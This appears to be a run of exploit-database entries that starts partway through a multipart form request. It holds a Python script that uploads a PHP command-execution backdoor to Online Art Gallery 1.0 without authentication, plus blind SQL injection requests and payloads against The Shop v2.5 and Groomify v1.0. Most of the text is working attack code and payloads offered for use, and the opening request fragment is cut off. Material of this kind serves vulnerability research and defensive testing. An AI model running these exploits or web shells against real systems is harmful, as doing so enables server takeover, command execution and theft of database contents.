Content-Disposition: form-data; name="exp_month" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_day" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_hour" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_minute" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_second" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sExpires" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category1" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Category2" hope-for-the-future -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="url_title" alert1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="description" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Keywords" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Image" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_1" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="custom_2" -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="save" Save -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="app_mode" async -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="_txp_token" fb6da7f582d0606882462bc4ed72238e -----------------------------26516646042700398511941284351--

# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated) # Google Dork: n/a # Date: 14/06/2023 # Exploit Author: Ramil Mustafayev # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a # Vulnerability Description: # # Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server. # Usage: python exploit.py http://example.com import requests import sys def upload_file(url, filename, file_content): files = { 'sliderpic': (filename, file_content, 'application/octet-stream') } data = { 'img_id': '', 'sliderPicSubmit': '' } url = url+"/Admin/adminHome.php" try: response = requests.post(url, files=files, data=data) except: print("[!] Exploit failed!") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python exploit.py <target_url>") sys.exit(1) target_url = sys.argv[1] file_name = "simple-backdoor.php" file_content = '<?php system($_GET["c"]);?>' upload_file(target_url, file_name, file_content) print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")

# Exploit Title: The Shop v2.5 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/the-shop/34858541 # Demo Site: https://shop.activeitzone.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /api/v1/carts/add HTTP/1.1 Content-Type: application/json Accept: application/json, text/plain, */* x-requested-with: XMLHttpRequest x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4 Referer: https://localhost Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7 Content-Length: 81 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null} ### Parameter & Payloads ### Parameter: JSON qty ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null} Type: time-based blind Title: MySQL > 5.0.12 OR time-based blind (heavy query) Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}

# Exploit Title: Groomify v1.0 - SQL Injection # Date: 2023-06-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# # Demo Site: https://script.bugfinder.net/groomify # Tested on: Kali Linux # CVE: N/A ### Vulnerable URL ### https://localhost/groomify/blog-search?search=payload ### Parameter & Payloads ### Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf) AND 'rszk'='rszk